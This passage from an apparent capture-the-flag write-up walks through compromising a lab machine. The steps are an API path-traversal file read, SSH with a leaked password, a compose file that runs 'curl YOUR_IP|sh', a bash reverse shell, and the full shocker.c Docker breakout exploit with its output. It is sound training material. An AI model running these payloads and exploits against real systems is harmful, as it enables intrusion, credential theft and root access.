www-data@070370e2cdc4:/tmp$ /tmp/chisel client 10.10.14.110:8000 R:5000:172.18.0.2:5000

Now let's download the cybermonday_api docker image on our machine.

sudo docker pull localhost:5000/cybermonday_api:latest

latest: Pulling from cybermonday_api


5b5fe70539cd: Pull complete
affe9439d2a2: Pull complete
1684de57270e: Pull complete
dc968f4da64f: Pull complete
57fbc4474c06: Pull complete
9f5fbfd5edfc: Pull complete
5c3b6a1cbf54: Pull complete
4756652e14e0: Pull complete
57cdb531a15a: Pull complete
1696d1b2f2c3: Pull complete
ca62759c06e1: Pull complete
ced3ae14b696: Pull complete
beefd953abbc: Pull complete
Digest: sha256:72cf91d5233fc1bedc60ce510cd8166ce0b17bd1e9870bbc266bf31aca92ee5d
Status: Downloaded newer image for localhost:5000/cybermonday_api:latest
localhost:5000/cybermonday_api:latest

After downloading the Docker image, we can initiate its execution in interactive mode.

sudo docker run -it localhost:5000/cybermonday_api:latest bash

Let's review the source code of the Cybermonday API to discover any potentially vulnerable functionality.

As soon as we inspect the config.php file, we see that it obtains MySQL authentication credentials from
the environment variables.

Analyzing the file app/routes/Router.php we see the routes defined in the API.
Previously, we had not seen the /webhooks/:uuid/logs route. Upon examination, it was found to invoke
the "LogsController" controller in the "Index" method, prompting further analysis.

Within the controller code for "LogsController", it becomes apparent that the apiKeyAuth() method is
invoked to secure the route.

We managed to obtain an API-KEY by analyzing the apiKeyAuth() method in the /app/helpers/Api.php


file. We see that this method checks whether the x-api-key HTTP header is present or not. And if present,
it checks whether the value of the x-api-key HTTP header is equal to the api_key variable.
Going back to the "LogsController" controller code, we see that the "action" of the webhook needs to be
"createLogFile" in order to be able to access the route /webhooks/:uuid/logs .

Analyzing the actions of this route, we see that the "list" action only lists the created logs, and the "read"
action reads those logs.

Here's the method to perform the "read" operation.


We see that the "read" action is vulnerable to LFI. This happens because str_replace is removing spaces
from the string in an insecure way. The correct thing would be to use the trim function, which removes
only the beginning and end of the string. Right after that, we have another condition that checks if the word
"log" is included in the string, but we can easily bypass this by specifying default Linux directories such as
/var/log .

We can try to read the /etc/passwd file using the following payload (note the spaces).

{
"action": "read",
"log_name": ".. /.. /var/log/.. /.. /etc/passwd"
}

The first step is to create a new webhook with the action "createLogFile”:

The second step is to define the headers to access the route, which includes x-api-key .

The third step is to access the route and send the payload to the endpoint /<uuid>/logs .

{
"action": "read",
"log_name": ".. /.. /var/log/.. /.. /etc/passwd"
}
The API response includes the contents of the /etc/passwd file, confirming the presence of a Local File
Inclusion (LFI) vulnerability.

Through Local File Inclusion (LFI), we can attempt to read /proc/self/environ , which stores the
environment variables.

{
"action": "read",
"log_name": ".. /.. /var/log/.. /.. /proc/self/environ"
}
The environment variables contain a variable DBPASS , which reveals the database password.

ngFfX2L71Nu

We can use this password to SSH into the remote host as the previously discovered user john .

ssh [email protected]

[email protected]'s password: ngFfX2L71Nu

john@cybermonday:~$ id
uid=1000(john) gid=1000(john) groups=1000(john)

The user flag can be obtained at /home/john/user.txt .

cat /home/john/user.txt

Privilege Escalation
Enumerating the user's sudo privileges, we see that john has permission to run the
/opt/secure_compose.py script with any .yml as an argument, with sudo privileges.
john@cybermonday:~$ sudo -l

[sudo] password for john:

Matching Defaults entries for john on localhost:


env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on localhost:


(root) /opt/secure_compose.py *.yml

Let's inspect the Python script located at /opt/secure_compose.py to comprehend its functionality.

#!/usr/bin/python3
import sys, yaml, os, random, string, shutil, subprocess, signal

def get_user():
return os.environ.get("SUDO_USER")

def is_path_inside_whitelist(path):
whitelist = [f"/home/{get_user()}", "/mnt"]

for allowed_path in whitelist:


if os.path.abspath(path).startswith(os.path.abspath(allowed_path)):
return True
return False

def check_whitelist(volumes):
for volume in volumes:
parts = volume.split(":")
if len(parts) == 3 and not is_path_inside_whitelist(parts[0]):
return False
return True

def check_read_only(volumes):
for volume in volumes:
if not volume.endswith(":ro"):
return False
return True

def check_no_symlinks(volumes):
for volume in volumes:
parts = volume.split(":")
path = parts[0]
if os.path.islink(path):
return False
return True

def check_no_privileged(services):
for service, config in services.items():
if "privileged" in config and config["privileged"] is True:
return False
return True

def main(filename):

if not os.path.exists(filename):
print(f"File not found")
return False

with open(filename, "r") as file:


try:
data = yaml.safe_load(file)
except yaml.YAMLError as e:
print(f"Error: {e}")
return False

if "services" not in data:


print("Invalid docker-compose.yml")
return False

services = data["services"]

if not check_no_privileged(services):
print("Privileged mode is not allowed.")
return False

for service, config in services.items():


if "volumes" in config:
volumes = config["volumes"]
if not check_whitelist(volumes) or not check_read_only(volumes):
print(f"Service '{service}' is malicious.")
return False
if not check_no_symlinks(volumes):
print(f"Service '{service}' contains a symbolic link in the volume,
which is not allowed.")
return False
return True

def create_random_temp_dir():
letters_digits = string.ascii_letters + string.digits
random_str = ''.join(random.choice(letters_digits) for i in range(6))
temp_dir = f"/tmp/tmp-{random_str}"
return temp_dir

def copy_docker_compose_to_temp_dir(filename, temp_dir):


os.makedirs(temp_dir, exist_ok=True)
shutil.copy(filename, os.path.join(temp_dir, "docker-compose.yml"))

def cleanup(temp_dir):
subprocess.run(["/usr/bin/docker-compose", "down", "--volumes"],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
shutil.rmtree(temp_dir)
def signal_handler(sig, frame):
print("\nSIGINT received. Cleaning up...")
cleanup(temp_dir)
sys.exit(1)

if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Use: {sys.argv[0]} <docker-compose.yml>")
sys.exit(1)

filename = sys.argv[1]
if main(filename):
temp_dir = create_random_temp_dir()
copy_docker_compose_to_temp_dir(filename, temp_dir)
os.chdir(temp_dir)

signal.signal(signal.SIGINT, signal_handler)

print("Starting services...")
result = subprocess.run(["/usr/bin/docker-compose", "up", "--build"],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
print("Finishing services")

cleanup(temp_dir)

This Python script is a security tool designed to validate and secure Docker Compose files. It checks various
security aspects, including whether privileged mode is disallowed, if volumes are restricted to a whitelist,
and if read-only and symbolic link constraints are enforced. The script creates a temporary directory, copies
the provided Compose file into it, and then uses docker-compose to start the services in the specified file. It
includes cleanup mechanisms to handle interruptions or the completion of service execution.

Notably, the script restricts the use of privileged mode for Docker containers. As an alternative approach,
we can employ the cap_add: all directive to confer all capabilities to our Docker container.

This blog post demonstrates that the application of CAP_DAC_READ_SEARCH to our container not only
enables unrestricted traversal of the file system but also eliminates checks for open_by_handle_at(2) ,
potentially granting our process access to sensitive files opened by other processes. The blog also
references the shocker.c script, which leverages the CAP_DAC_READ_SEARCH capability of the container,
allowing us to read any arbitrary file on the host system.

We are aware of the presence of a Docker image named cybermonday_api in the Docker registry of the
remote host. Consequently, let's instantiate a container using the cybermonday_api image. Additionally, we
will utilize the command directive to execute a reverse shell payload from within the container. We will
employ the below docker-compose file and save it as /tmp/pwn.yml on the remote host.
version: '3'
services:
pwn:
image: cybermonday_api
cap_add:
- ALL
command: sh -c "curl YOUR_IP:8001|sh"

We store the following bash reverse shell payload and save it as index.html file on our local machine.

echo "/bin/bash -c \"bash -i >& /dev/tcp/YOUR_IP/1337 0>&1\"" > index.html

We start a Python web-server in the same directory as that of the index.html file.

python3 -m http.server 8001

Netcat listening on port 1337 .

nc -nvlp 1337

Now, run the /opt/secure_compose.py script with /tmp/pwn.yml as an argument.

john@cybermonday:/tmp$ sudo /opt/secure_compose.py /tmp/pwn.yml

Starting services...

We receive a reverse shell as user root from within the container.

root@d78f5421d496:/var/www/html# id

uid=0(root) gid=0(root) groups=0(root)

root@d78f5421d496:/var/www/html# hostname
d78f5421d496

The shocker.c script is available here. We have modified the script to take read two arguments, one is the
path of the arbitrary file to read on the host system, second is the path of the file on the container to which
the contents of the read file will be written.

Moreover, the portion of the script aiming to obtain a file system reference by opening a particular file has
been modified to utilize the file /etc/hostname .

// get a FS reference from something mounted in from outside


if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");

Here is the modified shocker.c script that we will utilize to access any arbitrary file on the host system.
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>

struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};

void die(const char *msg)


{
perror(msg);
exit(errno);
}

void dump_handle(const struct my_file_handle *h)


{
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
}

int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct
my_file_handle
*oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}

++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}

fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}

int main(int argc,char* argv[] )


{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};

fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"


"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");

read(0, buf, 1);

// get a FS reference from something mounted in from outside


if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");

if (find_handle(fd1, argv[1], &root_h, &h) <= 0)


die("[-] Cannot find valid handle!");

fprintf(stderr, "[!] Got a final handle!\n");


dump_handle(&h);

if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)


die("[-] open_by_handle");

memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");

printf("Success!!\n");

FILE *fptr;
fptr = fopen(argv[2], "w");
fprintf(fptr,"%s", buf);
fclose(fptr);

close(fd2); close(fd1);

return 0;
}

Let us serve the shocker.c script and fetch it on the remote host.

root@12642a251489:/tmp# curl YOUR_IP:8001/shocker.c -o /tmp/shocker.c

Compile the C script on the docker container using the gcc utility and save the binary as /tmp/shocker .
root@12642a251489:/tmp# gcc -Wall -std=c99 -O2 /tmp/shocker.c -static -o /tmp/shocker

shocker.c: In function 'find_handle':


shocker.c:60:15: warning: implicit declaration of function 'open_by_handle_at' [-
Wimplicit-function-declaration]
60 | if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
| ^~~~~~~~~~~~~~~~~
shocker.c:62:16: warning: implicit declaration of function 'fdopendir'; did you mean
'opendir'? [-Wimplicit-function-declaration]
62 | if ((dir = fdopendir(fd)) == NULL)
| ^~~~~~~~~
| opendir
shocker.c:62:14: warning: assignment to 'DIR *' from 'int' makes pointer from integer
without a cast [-Wint-conversion]
62 | if ((dir = fdopendir(fd)) == NULL)

We can execute the shocker binary with the specified argument policy.

./shocker <file/to/read/on/host/system> /tmp/output.txt

Let's try to read the root flag /root/root.txt .

root@12642a251489:/tmp# ./shocker /root/root.txt output.txt

[***] docker VMM-container breakout Po(C) 2014 [***]


[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]

<enter>

[*] Resolving 'root/root.txt'

[*] Found lib


[*] Found boot
[*] Found libx32
[*] Found bin
[*] Found vmlinuz.old
[*] Found initrd.img
[*] Found ..
[*] Found root
[+] Match: root ino=20
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'root.txt'
[*] Found ..
[*] Found .
[*] Found .profile
[*] Found .local
[*] Found root.txt
[+] Match: root.txt ino=38
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root.txt) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
Success!!

We can see that the root flag has been successfully saved to the file /tmp/output.txt .

root@12642a251489:/tmp# cat output.txt

You might also like